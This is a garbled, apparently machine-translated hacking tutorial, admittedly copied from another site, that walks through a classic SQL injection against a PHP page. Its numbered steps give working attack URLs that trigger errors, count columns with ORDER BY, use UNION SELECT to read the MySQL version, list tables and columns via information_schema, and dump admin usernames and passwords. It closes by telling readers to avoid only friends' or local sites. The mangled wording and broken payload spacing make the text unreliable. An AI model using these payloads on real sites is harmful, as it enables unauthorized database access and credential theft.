Hacking Website with SQL Injection technique

Web hacking attacks or so-called web is very much the way, one of them by way of SQL injection.
What is SQL injection?SQL injection occurs when the attacker could insert some SQL statements to 'query'by way of manipulation of input data to the application page.
this is one way of doing SQL injection techniques, this way I Copas from http://jasakom.com by an author call it cruz3N
okay, let's look together.
1. The first time we did certainly find the target. For example, our target this time is http://www.target.com/berita.php?id=100
2. Add character 'at the end of the url or add the character "-" to see if any error messages.
Example:http://www.target.com/berita.php?id=100 '
or
http://www.target.com/berita.php?id=-100
4. Will display an error message ..."You have an error in your SQL syntax.You have an error in your SQL syntax; check theThat manual corresponds to your MySQL server version for the right syntax to use near'''at line 1 "And there are many more kinds.
5. Next step is to find and count the number of tables that exist in the database ...Here we will use the order by command
Example:http://www.target.com/berita.php?id=100+order+by+1/ *
Hohoho ... let alone that "/ *"? That is the character cover SQL command or we can also use "--". It's up wrote ...
If "+" as a link command ...
6. Well here directly dah sampe nyobain satu2 ...
http://www.target.com/berita.php?id=100+order+by+1/ * (not error)http://www.target.com/berita.php?id=100+order+by+2/ * (not there as well)http://www.target.com/berita.php?id=100+order+by+3/ * (tired dah)http://www.target.com/berita.php?id=100+order+by+4/ * (do not give up)
Until an error occurs ...Suppose that the error here ...
http://www.target.com/berita.php?id=100+order+by+10/ *
Means that we take is "9"http://www.target.com/berita.php?id=100+order+by+9/ *
7. To find out how many numbers that show we now use UNION
Example:http://www.target.com/news.php?id=100+union+select+1, 2,3,4,5,6,7,8,9 / *
Then note what number out (Kayak toggle aja ..., p)
8. For example, hockey figure that out is "3" then who can we'll do is check which version of mysql is using that with the command "version ()" or "@ @ version"
http://www.target.com/news.php?id=100+union+select+1, 2, version (), 4,5,6,7,8,9 / *
Or
http://www.target.com/news.php?id=100+union+select+1, 2, @ @ version, 4,5,6,7,8,9 / *
9. Well if its version 5 immediately wrote pake command "information_schema" to see the tables and columns in the database ...
Example:
http://www.target.com/berita.php?id=100+union+select+1, 2, table_name, 4,5,6,7,8,9 + from + information_schema.tables / *
Well said reply to see the other tables we add LIMIT at the end of the URL. But this time I really plasticity not use tables ... What I wrong? Maybe, but now that I want to explain is VERSION AND EXPERIENCE CAVE. Perhaps somewhat different ... ya know is just learning ... Hehehe ...
For example, the clay is lo table "admin"
Well now we see first-liat aja columns by replacing the word "table" of his ...
Example:http://www.target.com/berita.php?id=100+union+select+1, 2, column_name, 4,5,6,7,8,9 + from + information_schema.colums / *
For example, a column that comes out is "password" and "username"We see immediately wrote it ...
Example:http://www.target.com/news.php?id=100+union+select+1, username, 3,4,5,6,7,8,9 + from + admin / *
and
http://www.target.com/news.php?id=100+union+select+1, password, 3,4,5,6,7,8,9 + from + admin / *
Can diliat dah ama username login password ... Stay ... Find a cool hold ... It's up to you ...-------------------------------------------------- -
that's what is written there.you still do not understand about what is SQL injection?quiet please you download the files below document about SQL injection step by step.
Download SQL injection step by step.DOC

okay good luck.The most important on the web do not do your friends or on the website Local.